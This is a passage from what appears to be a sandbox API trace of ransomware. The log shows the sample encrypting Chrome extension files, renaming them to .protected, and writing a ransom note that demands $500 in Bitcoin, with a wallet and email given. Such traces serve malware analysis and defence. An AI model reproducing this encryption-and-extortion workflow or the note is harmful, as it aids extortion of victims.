HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.364] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.364] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.365] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.365] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.365] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.365] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.366] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.366] CloseHandle (hObject=0x168) returned 1 [0081.366] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.protected") returned 165 [0081.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.protected")) returned 1 [0081.367] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.367] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0081.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.367] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.367] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.368] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.368] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.368] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.368] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.368] CloseHandle (hObject=0x164) returned 1 [0081.368] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.368] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0081.368] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0081.369] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0081.369] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0081.369] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0081.369] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da") returned 141 [0081.369] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0081.369] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0081.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*") returned 143 [0081.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.370] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.370] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.370] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.370] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.370] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\.") returned 143 [0081.370] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.370] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.370] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.370] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.370] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.370] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.370] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\..") returned 144 [0081.370] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.370] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.370] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.370] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.370] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.370] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.370] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.372] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.372] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.372] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.372] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0081.373] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.373] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0081.373] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.373] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.373] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.373] CloseHandle (hObject=0x168) returned 1 [0081.373] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.protected") returned 165 [0081.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.protected")) returned 1 [0081.374] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.374] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.374] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0081.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.375] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.375] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.376] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.376] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.376] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.376] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.376] CloseHandle (hObject=0x164) returned 1 [0081.376] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.376] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0081.376] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0081.376] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0081.376] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0081.376] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0081.376] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de") returned 141 [0081.376] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0081.376] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0081.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*") returned 143 [0081.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.377] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.377] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.377] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.377] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.377] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.377] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\.") returned 143 [0081.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.377] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.377] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.377] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.377] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.377] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.377] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.377] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\..") returned 144 [0081.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.377] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.377] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.378] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.378] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.378] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xef, lpOverlapped=0x0) returned 1 [0081.379] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff11, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.379] WriteFile (in: 